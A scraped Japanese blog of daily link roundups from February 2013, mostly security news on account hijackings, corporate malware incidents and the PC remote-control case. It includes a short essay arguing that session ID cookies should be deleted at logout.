平均年収1000万円以上の人が、就活生に勧める企業はどこ？

高年収のビジネスパーソンは、就活生にどんな企業を勧めているのだろうか。平均年収が1000万円を超えている人たちに聞いた。ビズリーチ調べ。

Qetic（けてぃっく）は、時代に口髭を生やすニュースメディアです。音楽、映画、芸能、アート、ファッション、グルメ、アプリ、コラム、アニメなど、最新トレンドから今ネットで話題のゴシップまであらゆるエン

文章の短さという威力 (PBR/ピーヴァルポゥヴォーリィ)

Qetic

http://www.qetic.jp

2013/02/18(月)月曜日ー。（Ｏ垣さんを一本釣りするネタかと思った、、ｗ）

[セキュリティ] ログアウト時にセッションIDのCookieを破棄する必要はあるか？について徳丸さんのブログ（『* ログアウト機能の目的と実現方法

ログアウト機能の目的と実現方法

http://blog.tokumaru.org

』）に、気になる箇所があったので。。まず、徳丸さんのブログの記事で挙げられている、Cookieを用いた認証状態保持の場合は、ログイン状態を「そのまま」Cookieに保持するのではなく、セッション変数を使うべきという点、ログアウト時にはセッションIDのCookieを消すだけでなく、サーバ側のセッション破棄をおこなうことが重要であるという点には完全に同意します。その上で、気になったのは以下の箇所です。

textile**セッションIDのCookieを破棄する必要はあるか**…しかし、私は、セッションIDのクッキー（PHPのデフォルトはPHPSESSID）は削除する必要はないと考えます。その理由は、セッションが破棄された状態では、セッションIDは単なる乱数であり、攻撃の余地はないからです。

徳丸さんは、「セッションIDのクッキーは削除する必要はない」と言い切っておられますが、私は、削除したほうが良いのでは？と思います。例示されているPHPの場合は特に。・・・と言いますのも、ログアウトした後に必ずブラウザを閉じるわけではないと思うからです。ログアウト後に、ブラウザを閉じずに、またその同じサイトを散策することもままありますよね。そして、そのうちにセッションを使う箇所に再び差し掛かったときに、セッションIDのCookieを破棄していないままですと、【PHPにはセッションアダプションの問題がありますので、】前と同じセッションIDを使いまわしてしまいます。徳丸さんが例示したホテルのカードキーで考えますと、一度無効になったチェックアウト済みのカードキーが、次のチェックインでまた使えるようになってしまうイメージでしょうか。ログアウト済みのセッションIDを取得される機会なんてあるか？など考え始めると、問題が発生するのはレアケースになるわけですが、ただ、ログアウトという行為に期待する、セッションの完全な破棄という意味では、Cookieが破棄されないと片手落ちに近い状況と言えるのではないでしょうか。（レアケースを強いて挙げれば、『仮に通信路上でセッションIDが盗聴された場合でも、ログアウトしてしまえば、それ以降の悪用を避けることができます。』という期待がある中で、一過性の盗聴で、再ログイン後は盗聴していなかったケースなどでも、この機能を果たせなくなることなどが考えられます。）もちろん、セッションフィクセイション対策で、ログインなどでセッションIDの更新をしていれば問題はさらに低減できるでしょうが、例えば、ショッピングカート周りの動作など、ログイン前の部分への影響が無いとは言い切れませんので。次に気になったのは、BASIC認証にログアウト機能が無いことを受けて、“我々は「ログアウト機能のない世界」を知っており、一応それを受け入れていることになります。”としている点です。奇しくも徳丸さんが次の段落で検討されているように、BASIC認証については、「ブラウザを閉じる」ことで利用者側が明示的に認証状態を破棄する手段（≒ログアウト）があります。それに比べて、フォーム認証でサーバ側のセッション破棄がおこなわれない状況では（有効期限が切れるのを待つ以外の）対処のしようが無いわけですので、これらを同じ土俵に並べるのは少し違うのでは？と思ってしまいます。[雑談] いろいろ。

セキュリティにゃークサイド「ハッカー学校のサイトがハッキングされてしまったにゃーの巻」

「ハッカー学校のサイトがハッキングされてしまったにゃーの巻」（2月18日版）Scan名誉編集長りく君のセキュリティにゃークサイド | ScanNetSecurity

ホワイトハッカーを養成するための学校が運営している「8946」というハッキングチャレンジサイトがハッキングの被害に遭ってしまったんだにゃー。

http://scan.netsecurity.ne.jp

遠隔操作の痕跡、ウイルス・猫…関連徐々に (YOMIURI ONLINE/読売新聞)

大手柄の老猫、思わぬ人気江の島に相次ぐ捨て猫に脚光 (朝日新聞デジタル)

http://digital.asahi.com/articles/TKY201302180054.html

よく訓練されたアップル信者、都元です。今回のテーマは「WAF on AWS」です。 WAFとは通常、ファイヤーウォールと言えば、レイヤー2や3（IP, TCP/UDP）における通信制御を思い浮かべる

AWS上でSophos UTM 9のWAFを使ってSQLインジェクション攻撃を検出・防御してみた

AWS上で Sophos UTM 9 の Web Application Firewall (WAF) を使ってSQLインジェクション攻撃を検出・防御してみた | DevelopersIO

http://dev.classmethod.jp

Adobe ReaderとAcrobatの更新版、2月18日の週内に公開へ (ITmedia ニュース)

Adobe ReaderとAcrobatの更新版、2月18日の週内に公開へ

脆弱性修正のアップデートはWindows、Mac、Linux向けに2月18日の週内に公開される予定で、「ゼロデイ攻撃」に対処する。

http://www.denkeishimbun.co.jp

ポイントオブビュー：日本のインテリジェンス① (電経新聞)

ログイン ‹ 電経新聞 — WordPress

Facebook、「ゼロデイ攻撃を受けたがユーザーデータは無事」と発表 (ITmedia)

Facebook、「ゼロデイ攻撃を受けたがユーザーデータは無事」と発表

Facebookが、先月ゼロデイ攻撃を受けていたことを発表した。ユーザーデータが危険にさらされた証拠はないとしている。

多摩総合病院で救急車で運ばれたときのこと (ともちゃ日記)

ともちゃ日記(Tomo cha) - 元大学生のＯＬ日記-

http://tomocha.net

威力は広島型原爆の30倍ロシア隕石落下、負傷者1200人に (ITmedia ニュース)

IT総合情報ポータル「ITmedia」Home

サラリーマンのお小遣い額は平均3万9756円／月で、約30年前の1981年と同水準に落ちているという。新生銀行「サラリーマンのお小遣い調査30年白書」調べ。

サラリーマンのお小遣い、30年前の水準にまで下がった (ITmedia ニュース)

サラリーマンのお小遣い、30年前の水準にまで下がった

アメリカで行われた「2013年版恋愛、人間関係、テクノロジーに関する調査」。SNSを利用した“元恋人探し”がかなり頻繁に行われている事実が判明。調査結果はネット上でも話題に

元恋人の痴態 6％がネットに公開 (R25.jp) - livedoor ニュース

約半数が元恋人をネットで追跡 - ライブドアニュース

プロポーズは人生の大きなイベント。それがまったく見ず知らずの二人であっても、その場に居合わせたとなれば、心穏やかではいられないだろう。公衆の面前で突然始まるプロポーズ、周囲の注目は最高潮、ところが彼は

【ドッキリ】バレンタインに目前でプロポーズするカップルに動揺を隠せない人たちの動画

【ドッキリ】バレンタインに目前でプロポーズするカップルに動揺を隠せない人たちの動画

http://sugodo.com

女友達の彼と初対面！どこをチェックする？ (セキララ★ゼクシィ)

女友達の彼と初対面！どこをチェックする？-セキララ★ゼクシィ

容姿に始まり細かくチェックされるから、女友達に初めて彼を紹介するときって緊張します。女性の目は厳しいもの。みんなどこを見ているのか…女友達の彼氏をチェックするポイントはコレ！男と女のホンネからイマドキ

多くの人を魅了してやまないスポーツ。しかしスポーツに夢中になるのは、どうやら人間だけではなさそうだ。そう、ニャンコだって夢中になるのである！動画「Cat watchi …

中におじさんが入ってるでしょ？アイスホッケーの試合に首ったけのニャンコ

【心ほっこり動画】中におじさんが入ってるでしょ？　アイスホッケーの試合に首ったけのニャンコ

「@BurgerKing」のアカウントは凍結され、McDonald'sは「私たちは無関係」とコメントした。

2013/02/19(火)火曜日ー。（IPAに「通報」してもお望みの効用は無さそうな。。）

[雑談] いろいろ。

Burger KingのTwitterが乗っ取り被害、「McDonald'sに売却」と虚偽ツイート (ITmedia)

Burger KingのTwitterが乗っ取り被害、「McDonald'sに売却された」と虚偽ツイート

バーガーキングのTwitterアカウントがハッキングされ、マクドナルドになる (GIZMODO)

バーガーキングのTwitterアカウントがハッキングされ、マクドナルドになる

　米大手ハンバーガーチェーンBurger Kingが「Twitter」サイトに開設している公式アカウントが乗っ取られたと、複数の米英メディアVentureBeat、Reuters、ABC Newsなど

Burger KingのTwitterアカウントがハッキング被害に-米英メディアが報道 (ITpro)

Burger KingのTwitterアカウントがハッキング被害に---米英メディアが報道

昨年11月にJAXAの端末がコンピュータウイルスに感染した問題で、同機構は「仮に情報漏えいがあったとしても、事業の円滑な遂行には支障がない」としている。

JAXA、ウイルス感染被害の調査結果を発表原因は「震災」のなりすましメール (ITmedia)

JAXA、ウイルス感染被害の調査結果を発表　原因は「震災」のなりすましメール

米国の企業、政府機関、団体を標的にしたサイバー攻撃は、「圧倒的な割合」で上海郊外にある中国人民解放軍に関連した12階建てオフィスビルが発信源となっている。The New York Timesが伝えた。

米国企業や政府へのサイバー攻撃、中国人民解放軍が関与か (CNET Japan)

米国企業や政府へのサイバー攻撃、中国人民解放軍が関与か--The New York Times報道

橋下徹大阪市長のTwitterアカウントから意味不明なツイートが投稿され、アカウント乗っ取りが疑われる騒ぎに。

OWASP Top 10 - 2013 English - Release Candidate - Google Project Hosting

Google Code Archive - Long-term storage for Google Code Project Hosting.

https://code.google.com

橋下市長アカウントから不審なツイート (ITmedia ニュース)

橋下市長アカウントから不審なツイート

　日本維新の会共同代表の橋下徹大阪市長(43)のツイッターから16日夜に不審なメッセージが発信された問題で、同市長は18日、ツイッターのアカウントが何者かに乗っ取られていたことを明かした。大阪市内で記

橋下市長ツイッター「乗っ取りだった」 (デイリースポーツ online)

橋下市長ツイッター「乗っ取りだった」/デイリースポーツ online

http://www.daily.co.jp

ハッキングされたハッカー学校とハッキング実行犯との喧嘩 - Togetter

ハッキングされたハッカー学校とハッキング実行犯との喧嘩

ハッキングされたハッカー学校@WhiteHackerZ1と犯人らしい@a08855277311655が揉めているようです

http://togetter.com

標的型攻撃メールの添付ファイル、PDF/DOCの割合が減少、EXEは増加 (impress)

標的型攻撃メールの添付ファイル、PDF/DOCの割合が減少、EXEは増加　

http://internet.watch.impress.co.jp

極めればフリックより早くなる。文字アプリ最速候補『スライム』 (TABROID)

http://www.tabroid.jp/app/tools/2013/02/com.pitecan.slime.html

http://www.tabroid.jp

みんなのケータイ: 「電話帳アクセスモニター」って一体ナニ？ (impress)

[みんなのケータイ]「電話帳アクセスモニター」って一体ナニ？

http://k-tai.impress.co.jp

探偵ファイル～スパイ日記～: スパイになれる？メガネ型隠しカメラの実力 (ニノマ)

探偵ファイル～スパイ日記～／スパイになれる？メガネ型隠しカメラの実力／ニノマ

探偵ならではの情報網を活かし、あらゆるジャンルを網羅したバラエティサイト。

http://www.tanteifile.com

スパム防止の「CAPTCHA」に秘められたすごい事実 (ihayato.書店)

403 Forbidden

http://www.ikedahayato.com

【ロシア隕石落下】旅客機と隕石ニアミス「極めて危険」と機長ら (MSN産経ニュース)

http://sankei.jp.msn.com/world/news/130218/erp13021813000004-n1.htm

たとえば、とても大規模な団地だったり、いくつも立ち並ぶ高層マンションだったり。そうした光景を見て圧倒されたことが皆さんにも一度はあるのでは？しかし、それで驚 …

見続けていると頭の中がどうにかなりそう!! 延々と部屋が続く中国のビル画像たち (Pouch)

見続けていると頭の中がどうにかなりそう!!　延々と部屋が続く中国のビル画像たち…これはもはや一種のアート！

http://youpouch.com

【画像】慶應義塾大学・総合政策の入試でまさかの「数独」出題wwwww - NAVER まとめ

サービス終了のお知らせ - NAVER まとめ

NAVERまとめサービス終了のお知らせ

http://matome.naver.jp

デイリーポータルZ：から揚げ粉でクッキーを作る (@nifty)

から揚げ粉でクッキーを作る

から揚げの美味さはほぼ衣ではないのか。美味さを凝縮したクッキーを作ります。 (安藤昌教)

http://portal.nifty.com

2013-02-18: トイレにとじこめられてます。 (Everything You’ve Ever Dreamed)

2013-02-18

ただの日記です。それ以上でもそれ以下でもありません。

2012年、彗星のごとくネット界に登場した美少女アスリートMichelle Jennekeさん。彼女に人気が爆発したきっかけは2012年に行われた世界ジュニア陸上選手権だ。ハードル競 …

試合前のセクシーダンスで人気の美少女アスリートが今度はビキニでプルプルしてるぞーッ

【ぷるぷる】試合前のセクシーダンスで人気の美少女アスリートが今度はビキニでプルプルしてるぞーッ

FacebookやTwitterに続き、Appleもマルウェア感染の被害に遭っていたことが分かった。

2013/02/20(水)水曜日ー。（肌が乾燥してかゆい。クリームでも買うか。。）

[雑談] いろいろ。

Apple社内のMacもマルウェア感染、Javaの脆弱性を悪用 (ITmedia エンタープライズ)

Apple社内のMacもマルウェア感染、Javaの脆弱性を悪用

2月1日の臨時アップデートで積み残した5件の脆弱性を修正した。危険度が極めて高い脆弱性も含まれる。

Oracle、Java最新版の「Java 7 Update 15」を公開 (ITmedia エンタープライズ)

Oracle、Java最新版の「Java 7 Update 15」を公開

全種類のウイルス見つかる＝容疑者の派遣先ＰＣ情報も－遠隔操作事件 (時事ドットコム)

時事ドットコム

遠隔操作、ウイルスに容疑者派遣先のＰＣ情報 (YOMIURI ONLINE/読売新聞)

遠隔操作ウイルス男の会社から送信 (NHKニュース)

エラー｜NHK NEWS WEB

『週プレNEWS』は、集英社「週刊プレイボーイ」運営のニュースサイト。男の好奇心を刺激する最新ニュースをお届けします！指定されたページは見つかりませんでした。

パソコン遠隔操作事件で容疑者の逮捕前取材がエスカレートした理由 (週プレNEWS)

指定されたページは見つかりませんでした。｜週プレNEWS［週刊プレイボーイのニュースサイト］

http://wpb.shueisha.co.jp

「PC遠隔操作事件」における"闇"（後） (NetIB-NEWS/ネットアイビーニュース)

「PC遠隔操作事件」における闇"（後）｜Net-IB｜九州企業特報

http://www.data-max.co.jp

【PC遠隔操作事件】被疑者の素顔を弁護人に聞く(江川紹子) - Yahoo!ニュース

【PC遠隔操作事件】被疑者の素顔を弁護人に聞く（江川紹子） - 個人 - Yahoo!ニュース

警察の誤認逮捕で注目されたPC遠隔操作事件。「30歳男」の逮捕が大々的に報じられたが、決定的な証拠とされた監視カメラの映像や被疑者の携帯の中の写真も、存在が疑問視されている。弁護人の言い分を聞いた。

http://bylines.news.yahoo.co.jp

遠隔操作首輪つけた瞬間画像｢存在疑わしい」 (GoHoo)

http://gohoo.org/alerts/130220/

http://gohoo.org

Easy DOM-based XSS detection via Regexes - SpiderLabs Anterior

Web App - Unavailable

http://blog.spiderlabs.com

第26回私が選ぶサラ川ベスト10: サラリーマン川柳 (第一生命保険株式会社)

2022年サラっと一句！わたしの川柳投票受付中！

2022年サラっと一句！わたしの川柳の公式サイトです。全国から寄せられた85,437句の中から優秀100句が決定！お気に入りの句に投票しよう！

http://event.dai-ichi-life.co.jp

最近の通報レベル高すぎｗｗｗｗｗｗｗ (妹はVIPPER)

404 Not Found | このページは存在しないか、すでに削除されています

http://vipsister23.com

海外女子が日本で売ってる“コンドームアイス”に仰天!! (Pouch［ポーチ］)

みんなも一度は食べたことがあるのでは？海外女子が日本で売ってる“コンドームアイス”に仰天!!

今、インターネット上であるアイスクリームが話題になっています。そのアイスクリームとは、ゴムフーセンに入ったいわゆる「たまごアイス」。まだまだ寒い日が続くのに、 …

http://youpouch.com

ぼったくりメイド喫茶潜入ルポ「冥土喫茶に当たった」と泣き寝入りのケースも (ITmedia)

IT総合情報ポータル「ITmedia」Home

最近話題の街コン。行ってみたいけど、ほんとに男性との出会いってあるの？ということで、街コンってどういう場なのか潜入取材してきました！街コンで彼氏候補になる男性とは出会えるのか！？男と女のホンネからイマ

出会いはある？話題の“街コン”に潜入！ (セキララ★ゼクシィ)

出会いはある？話題の“街コン”に潜入！-セキララ★ゼクシィ

日本経済新聞の電子版。日経や日経ＢＰの提供する経済、企業、国際、政治、マーケット、情報・通信、社会など各分野のニュース。ビジネス、マネー、IT、スポーツ、住宅、キャリアなどの専門情報も満載。

2013/02/21(木)木曜日ー。（Google Mapsに出てこない近所のお店は気づかない。）

[雑談] いろいろ。

[FT] 増加する中国政府のサイバー活動（社説） (日本経済新聞)

[FT]増加する中国政府のサイバー活動（社説） - 日本経済新聞

Googleによると、1秒当たり100以上のGoogleアカウントが窃盗の対象になっているが、さまざまな取り組みにより、窃盗されるアカウントはピーク時より99.7％減少した。

「1秒当たり100アカウントが狙われている」 Googleが盗難防止の取り組みを説明 (ITmedia)

「1秒当たり100アカウントが狙われている」──Googleが盗難防止の取り組みを説明

　今回は、セキュリティベンダーが注意を促している不正アプリケーションなどについてのブログを取り上げる。まず最初は、米マカフィーのブログ。同社はAndroid向けアプリケーションの公式ストア「Googl

多数の機能を備えた不正Androidアプリ、AutoRun攻撃など (ITpro)

多数の機能を備えた不正Androidアプリ、AutoRun攻撃など

先日、クレジットカードの明細をWebから見たら、身に覚えがない請求がありました。 facebookから2日間に渡って1回1万円くらいの決済が50回ほどされてました。つまり50万円くらいですね。 fa

facebookから50万円くらい不正請求がきた場合の対応まとめ (abi-station)

facebookから50万円くらい不正請求がきた場合の対応まとめ｜ Abi-Station

http://www.abi-station.com

httpstatus ブックマークレットで、HTTP のステータスコードをすばやくしらべる! (葉っぱ日記)

httpstatus ブックマークレットで、HTTP のステータスコードをすばやくしらべる! - 葉っぱ日記

一般的な Web Programmer ならば、HTTP Status code はすべて暗記していると聞きました。しかし、僕は初心者なので、なかなか覚えきれていないので、HTTPのステータスコードを

７８７: 機体の電気回路に設計ミス…運輸安全委 (毎日ｊｐ/毎日新聞)

| 毎日新聞

世界最大級のオンラインショッピングサイトAmazonはイギリスの田舎町Rugeleyにサッカーコート9個分の巨大な物流センターを保有しています。この物流センターが設立されると発表された直後は地域の永続

Amazon物流センターの過酷な労働の実態が判明、多大なる犠牲が明らかに (GIGAZINE)

Amazon物流センターの過酷な労働の実態が判明、多大なる犠牲が明らかに

婚活を諦めた去年の中頃から約半年間、某ネット婚活サービスに登録し、月2人ほどのペースで女性会員の方とお会いしてきましたが、あまりの不毛さに嫌気が差し、しばらくお休みすることにしました*1。 30歳を

婚活を諦めた (自意識高い系男子 id:Ta-nishi)

婚活を諦めた - 自意識高い系男子

http://ta-nishi.hatenablog.com

カワイイは世界を救う！超絶キュートな動物が次々と登場する癒しの6分間をどうぞ!!

【究極癒し動画】カワイイは世界を救う！　超絶キュートな動物が次々と登場する癒しの6分間をどうぞ!!

連日の仕事や勉強で体も心も疲れ切っているそこのあなた、ぜひこの動画を見てほしい。なぜならこれを見れば、元気100倍になるからだ！「Really cute animals」というそ …

かわいい楽しいちょっとヘン！乙女にステキを贈る Pouch［ポーチ］

ニャンコに学ぶ『幸せな子猫を育てるための10のアドバイス』 (Pouch［ポーチ］)

http://youpouch.com/2013/02/20/106981/

http://youpouch.com

2013/02/22(金)金曜日ー。（DDoSの意味わかってるのかしら、、）

[雑談] いろいろ。

学生ハッカー大会、Ｖ候補は最年少・灘高チーム (YOMIURI ONLINE/読売新聞)

米中サイバー戦争の報告書に便乗した不正メール出回る、日本語のなりすまし版も (ITmedia)

米中サイバー戦争の報告書に便乗した不正メール出回る、日本語のなりすまし版も

　2013年2月中旬はサイバー攻撃に関する重大ニュースが相次いだ。最大のものが、米国のセキュリティ会社が「大規模サイバー攻撃に中国人民解放軍（61398部隊）が関与している」という報告書を公開したニュ

週末スペシャル: 一段と深刻化するサイバー攻撃、Facebook、Appleも標的に (ITpro)

一段と深刻化するサイバー攻撃、Facebook、Appleも標的に

これがアップルのハック感染元。水飲み場攻撃で４0社に被害？ (ギズモード・ジャパン)

これがアップルのハック感染元。水飲み場攻撃でフェイスブック、ツイッターなど40社に被害？（動画）追記：マイクロソフトも

パスワードを盗み出すトロイの木馬や、特定の標的を狙って執拗な攻撃を続ける「APT攻撃」が、政府機関やメーカー、商取引インフラなどにターゲットを拡大しているという。

マルウェアの標的がシフト、幅広い業界に「しつこい攻撃」 McAfee報告書 (ITmedia)

マルウェアの標的がシフト、幅広い業界に「しつこい攻撃」――McAfee報告書

企業の中には、『自分のところはしっかりとした対策が実施できているので、診断の必要はない』と考える人も多いだろう。実際、企業のシステム構築を行うSIerは、セキュリティに配慮した上でシステムを構築し、W

セキュリティ診断を受けていないシステムには大抵穴がある!(後編) (マイナビニュース)

セキュリティ診断を受けていないシステムには大抵穴がある!(後編)

http://news.mynavi.jp

twitterの非公開リストが公開されるバグが発生し阿鼻叫喚まとめ - NAVER まとめ

サービス終了のお知らせ - NAVER まとめ

NAVERまとめサービス終了のお知らせ

http://matome.naver.jp

NECのRAIDコントローラに脆弱性、HDDが不正操作される恐れ (ITmedia エンタープライズ)

NECのRAIDコントローラに脆弱性、HDDが不正操作される恐れ

「Universal RAID Utility」にアクセス権限の不備が見つかり、この問題を修正するアップデートがリリースされた。

http://internet.watch.impress.co.jp

サクラサイト業者も注目しはじめた「LINE」、攻撃の手口とその対策 (impress)

サクラサイト業者も注目しはじめた「LINE」、攻撃の手口とその対策　

コピーを20回繰り返すとクラッシュする不具合がSamsungのAndroid端末に存在 (GIGAZINE)

コピーを20回繰り返すとクラッシュする不具合がSamsungのAndroid端末に存在

Samsungが発売しているAndroidスマートフォン「Galaxy S III」やAndroidタブレット「Galaxy Note」「Galaxy Tab」で、テキストなどのコピーを20回繰り返す

グーグル眼鏡をつけて見る世界はこんなの！グーグルがプロモーション動画公開 (GIZMODO)

グーグル眼鏡をつけて見る世界はこんなの！グーグルがプロモーション動画公開

モバイルで生活が良くなる、楽しくなる、ということを訴求する通信会社のプロモーション動画である。バスを待つ人たちに、バス停の看板に書かれたモバイルサイトにアクセスさせ、そこからさまざまなドッキリが始まる

Presenting 3Doodler, the world's first 3D printing pen - YouTube

【おもしろ実験】バス停で携帯を使うとドッキリが始まる、モバイル生活が楽しく感じる動画！？

【おもしろ実験】バス停で携帯を使うとドッキリが始まる、モバイル生活が楽しく感じる動画！？

http://sugodo.com

超美人なのに下ネタのダンスをする「ある女の子」がマジでカワイイ (ロケットニュース24)

超美人なのに下ネタのダンスをする「ある女の子」がマジでカワイイ / ネットユーザー「残念な美人」

キターァァァァァァーーーー!!!!!　カワイイィィィィーー!!! 　どうしてこうなったァァァァーーーーー!!　そう叫びたくなるような動画をニコニコ動画にアップしているの …

何気なく言ったひと言なのに、彼の怒りに触れて、あやうく別れることに…なんて経験している女子って、意外と多いのでは？そんな彼の愛を一気に冷ますNG発言の数々を紹介します。男と女のホンネからイマドキ事情ま

騙される前に知っておくべき悪徳「出会い系」の裏話8つ【前編】 (Menjoy! メンジョイ)

ページが見つかりません。 | MENJOY

http://www.men-joy.jp

彼の愛を一気に冷ます“ＮＧ発言”って？ (セキララ★ゼクシィ)

彼を傷つけたかも…？愛が一気に冷える“NG発言”に要注意！-セキララゼクシィ

ウイルスチェックを促す迷惑メールが出回っていると、トレンドマイクロが注意喚起している。

2013/02/23(土)土曜日ー。（なかなかアクティブな攻防だったようで。。）

[雑談] いろいろ。

SECCON 競技コンテスト開催！: SECCON CTF全国大会（2012年度）

404 Not Found

http://www.seccon.jp

トレンドマイクロになりすました「torendmicro」メールに注意を (ITmedia ニュース)

トレンドマイクロになりすました「torendmicro」メールに注意を

http://blog.trendmicro.co.jp

迷惑メールの追跡から判明した攻撃者の思惑 (トレンドマイクロセキュリティブログ)

迷惑メールの追跡から判明した攻撃者の思惑 | トレンドマイクロセキュリティブログ

「中国軍のサイバー攻撃関与の“偽報告書”」出回る、シマンテックが注意喚起 (ITpro)

「中国軍のサイバー攻撃関与の“偽報告書”」出回る、シマンテックが注意喚起

　シマンテックは、中国人民解放軍がサイバー攻撃に関与しているとした米Mandiant社の報告書をかたった“偽報告書”を添付した日本語の標的型メール攻撃が見つかったとして、注意を喚起する文書を出した。

Mandiant 社のレポートを悪用する標的型攻撃 (Symantec Connect コミュニティ)

Home - Broadcom Community - Discussion Forums, Technical Docs, and Expert Blogs

http://www.symantec.com

米マイクロソフトにもサイバー攻撃 (時事ドットコム)

時事ドットコム

昨年4人の誤認逮捕を生んだ、いわゆるＰＣ遠隔操作事件。片山祐輔氏の逮捕後、捜査側の大量の情報を流した初期報道には、いくつかの点で事実誤認の可能性があることが、弁護人の指摘で明らかになった。

弁護人が指摘した3つの誤報疑惑―PC遠隔操作事件(楊井人文) - Yahoo!ニュース

弁護人が指摘した3つの誤報疑惑―PC遠隔操作事件（楊井人文） - 個人 - Yahoo!ニュース

http://bylines.news.yahoo.co.jp

遠隔操作事件・佐藤弁護士からのメール (弁護士落合洋司の「日々是好日」)

2013-02-23

弁護士落合洋司（東京弁護士会）の日々是好日

企業の情報システムでは「仮想化」や「クラウド化」が全盛を迎えつつある。この先、情報システムの評価をどうしていくべきか――。

“迷探偵”ハギー：クラウド時代のシステム監査あなたが担当ならどうする？ (ITmedia)

クラウド時代のシステム監査　あなたが担当ならどうする？

GoogleがProject GlassのWebサイトを開設し、1500ドルのプロトタイプ購入権付きのプロジェクトメンバー募集を開始した。

Google、電脳メガネ「Glass」プロジェクトメンバーを募集（動画あり） (ITmedia ニュース)

Google、電脳メガネ「Glass」プロジェクトメンバーを募集（動画あり）

　2013年1月に、一風変わった催しがあった。舞台に上がった2人の「選手」が試合をするのだが、2人はただ座って画面上で進むパズルゲームの成り行きを見守るだけ。一定時間が経過すると画面上に「WIN」「L

記者の眼: 面白い！「学生プログラマ日本一決定戦」観戦記 (ITpro)

面白い！「学生プログラマ日本一決定戦」観戦記

春の卒業シーズンも目前、コンビニエンスストアや飲食店などでは学生アルバイトの入れ替わりが激しくなる時期を迎えた。店頭でも「バイト募集」の貼り紙が目立つ。ところで最近、ここに提示される時給金額がジリジリ

上がり続けるバイト時給黒幕は「ゆとり教育」？ (日本経済新聞)

上がり続けるバイト時給　黒幕は「ゆとり教育」？ - 日本経済新聞

ミール: 露大統領から寄贈の猫１歳県が写真を公開／秋田 (毎日ｊｐ/毎日新聞)

| 毎日新聞

2013/02/24(日)日曜日ー。（最後の追い上げが熱かったらしい～。）

[雑談] いろいろ。

警視庁: 「ＰＣ技術、正義のために」ハッカー大会でＰＲ (毎日ｊｐ/毎日新聞)

| 毎日新聞

東京新聞の総合ニュースサイト。首都圏・関東地方のニュースと生活情報を中心に、様々な地域情報を提供します。

SECCON 競技コンテスト開催！: 激闘！全国大会

401 Authorization Required

http://www.seccon.jp

/ * 続々集結中

401 Authorization Required

http://www.seccon.jp

中国軍ハッカー求人？ＩＴ学生入隊条件に奨学金 (TOKYO Web/東京新聞)

お探しのページが見つかりませんでした| 東京新聞 TOKYO Web

http://www.tokyo-np.co.jp

“サイバー攻撃”61398部隊の正体 (東スポＷeb/東京スポーツ新聞社)

ページが見つかりませんでした | 東スポWEB

東スポのページが見つかりませんでしたに関するニュースを掲載。気になる１面や充実のページが見つかりませんでしたニュースはもちろん、“キレ”のある記事をお届けします。

http://www.tokyo-sports.co.jp

Microsoftにもサイバー攻撃、Mac事業部門でマルウェア感染 (ITmedia エンタープライズ)

Microsoftにもサイバー攻撃、Mac事業部門でマルウェア感染

MicrosoftもFacebookやAppleと同様の被害に遭っていたことを明らかにした。

SQLインジェクションについて解説したブログ記事を読んだところ、ユニークな対策方法が紹介されていました。この対策方法の問題点について解説し、正しい脆弱性対処の重要性を説明します。ユニークなSQ

自己流のSQLインジェクション対策は危険 (徳丸浩の日記)

自己流のSQLインジェクション対策は危険

http://blog.tokumaru.org

スマホ不正アプリまた活発化起訴見送りの影響指摘も (朝日新聞デジタル)

http://digital.asahi.com/articles/TKY201302230382.html

http://internet.watch.impress.co.jp

米Microsoft、Windows AzureがSSL証明書失効で約12時間サービス機能停止に (impress)

米Microsoft、Windows AzureがSSL証明書失効で約12時間サービス機能停止に　

個人をエンパワーしてきたRuby -Ruby 20周年記念パーティ祝辞LT- (Tadashi Tada)

個人をエンパワーしてきたRuby -Ruby 20周年記念パーティ祝辞LT-

レンタルサーバで Rubyが使えることは稀先進的な一部の Linuxディストリビューションが Rubyを収録 (20世紀末ごろ) B.R.(before rails)時代【出版ブーム】いきな

http://prezi.com

Googleドライブにテキストのコピペも可能なプレビュー機能 (ITmedia ニュース)

Googleドライブにテキストのコピペも可能なプレビュー機能

Googleドライブにファイルのプレビュー機能が追加された。

TechCrunch | Reporting on the business of technology, startups, venture capital funding, and Silicon

Googleが改良版UDPとしてQUICというプロトコルを開発中（らしい）

TechCrunch | Startup and Technology News

http://jp.techcrunch.com

【銃規制の行方】店に銃を持ってきたらピザ代15パーセント引きのサービスに客が殺到

U-NOTE[ユーノート] - 仕事を楽しく、毎日をかっこ良く。 -

http://irorio.jp

そんなのあるの!? びっくりされた方言（ヒトメボ） (Peachy[ピーチィ])

出身が違う人に驚かれる「方言」 - ライブドアニュース

出身が違う人に話してびっくりされたことのある言葉。「じょんじょん(静岡などで使われる草履を意味する言葉)」。「モータープール(関西でおもに使われる民間駐車場のこと)」。他にも「血が死んだ」「やおい」な

　大手ネット企業のサイバーエージェントにおける若手女子社員の活躍が目覚ましい。仕事だけではなく、おしゃれも、プライベートも、全方位で手を抜かない「キラキラ女子」がその中核。最近では複数の女子社員がスマ

サイバーエージェント、躍進支える「キラキラ女子」 (日本経済新聞)

サイバーエージェント、躍進支える「キラキラ女子」 - 日本経済新聞

http://masuda.livedoor.biz

好きでもない人と付き合うということが普通の世界

404 Not Found | このページは存在しないか、すでに削除されています

人前でのタッチはNG!?　男性がうれしい「ボディタッチ」の方法 (マイナビウーマン)

人前でのタッチはNG!?　男性がうれしい「ボディタッチ」の方法 - Peachy - ライブドアニュース

男性がうれしい「ボディタッチ」の方法を紹介。「笑いながら叩かれたい」「触れる場所が大事」。「頭を乗せてくるのは無防備でアリ」「みんなが見ている前のボディタッチはNG」など